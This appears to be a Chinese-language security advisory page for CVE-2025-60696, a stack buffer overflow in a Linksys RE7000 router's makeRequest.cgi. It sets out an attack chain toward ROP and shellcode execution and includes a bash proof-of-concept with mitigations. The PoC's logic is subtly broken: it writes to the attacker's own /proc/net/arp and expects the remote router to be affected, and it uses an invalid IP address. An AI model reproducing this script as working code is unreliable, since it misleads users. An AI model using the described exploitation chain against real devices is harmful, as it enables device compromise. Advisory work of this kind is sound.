CVE-2025-60696 CVSS 8.4 高危

CVE-2025-60696 Linksys RE7000 makeRequest.cgi栈缓冲区溢出漏洞

披露日期: 2025-11-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-60696

漏洞类型

栈缓冲区溢出

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linksys RE7000路由器

漏洞概述

CVE-2025-60696是Linksys RE7000路由器固件FW_v2.0.15_211230_1012中的一个高危安全漏洞。该漏洞位于makeRequest.cgi二进制文件的arplookup函数中，由于不当的内存缓冲区处理导致栈缓冲区溢出。攻击者可以通过操控/proc/net/arp文件内容，利用sscanf函数的格式化字符串%s宽度限定符与实际目标缓冲区大小不匹配的问题，向栈上的小型缓冲区写入超长字符串，从而触发缓冲区溢出。此漏洞无需认证即可利用，攻击复杂度低，对路由器的机密性、完整性和可用性均造成严重影响。成功利用可导致路由器拒绝服务甚至执行任意代码。

技术细节

漏洞根源在于arplookup函数使用sscanf("%16s ... %18s ...")解析/proc/net/arp文件中的行数据。sscanf的%16s格式说明符允许最多16字节的输入字符串，%18s允许最多18字节。然而，存储解析结果的栈缓冲区v6仅有12字节，v7仅有20字节。当ARP表条目包含超过缓冲区容量的MAC地址或IP地址字符串时，超出部分会溢出到相邻的栈内存区域，覆写函数返回地址和其他关键变量。攻击者可通过修改/proc/net/arp的内容（如添加长字符串条目），诱使makeRequest.cgi处理恶意构造的ARP数据，最终实现栈破坏和代码执行。

攻击链分析

STEP 1

步骤1

攻击者获得Linksys RE7000路由器的本地访问权限

STEP 2

步骤2

向/proc/net/arp文件写入包含超长字符串的恶意ARP条目

STEP 3

步骤3

诱使路由器CGI进程调用makeRequest.cgi的arplookup函数

STEP 4

步骤4

arplookup函数使用sscanf解析恶意ARP数据，超长字符串溢出v6(12字节)和v7(20字节)栈缓冲区

STEP 5

步骤5

栈内存被破坏，攻击者可覆写返回地址和关键变量

STEP 6

步骤6

通过构造ROP链和shellcode，攻击者实现任意代码执行或造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-60696 PoC - Linksys RE7000 Buffer Overflow
# Target: Linksys RE7000 makeRequest.cgi
# Firmware: FW_v2.0.15_211230_1012

TARGET_IP="192.168.1.1"
MALICIOUS_ARP_ENTRY=$(python3 -c "
import struct
# Create overflow payload: >12 bytes for v6 buffer, >20 bytes for v7 buffer
payload = 'A' * 64  # Overflow data
mac = payload + ':' + payload[:12]
ip = '192.168.1.999'
print(f'{ip:<16} 0x2  {mac:<18}  *        br0')
")

echo "[*] Injecting malicious ARP entry to trigger overflow..."
echo "$MALICIOUS_ARP_ENTRY" | sudo tee /proc/net/arp > /dev/null 2>&1

echo "[*] Triggering makeRequest.cgi..."
curl -s "http://$TARGET_IP/makeRequest.cgi" -o /dev/null

echo "[*] Check for crash or unexpected behavior"
echo "[*] For RCE, replace padding with ROP chain and shellcode"

影响范围

Linksys RE7000 固件 FW_v2.0.15_211230_1012

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 禁用路由器的远程管理功能，仅允许本地网络访问；2) 监控/proc/net/arp文件变化，检测异常ARP条目；3) 使用网络访问控制(NAC)限制非授权设备接入内网；4) 考虑使用替代固件如OpenWrt；5) 在边界防火墙上阻止对路由器管理端口的未授权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60696
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60696
3 Details https://www.cvedetails.com/cve/CVE-2025-60696/
4 VulDB https://vuldb.com/cve/CVE-2025-60696
5 Link http://linksys.com
6 Link https://github.com/yifan20020708/SGTaint-0-day/blob/main/Linksys/Linksys-RE700/CVE-2025-60696.md
7 Link https://www.linksys.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表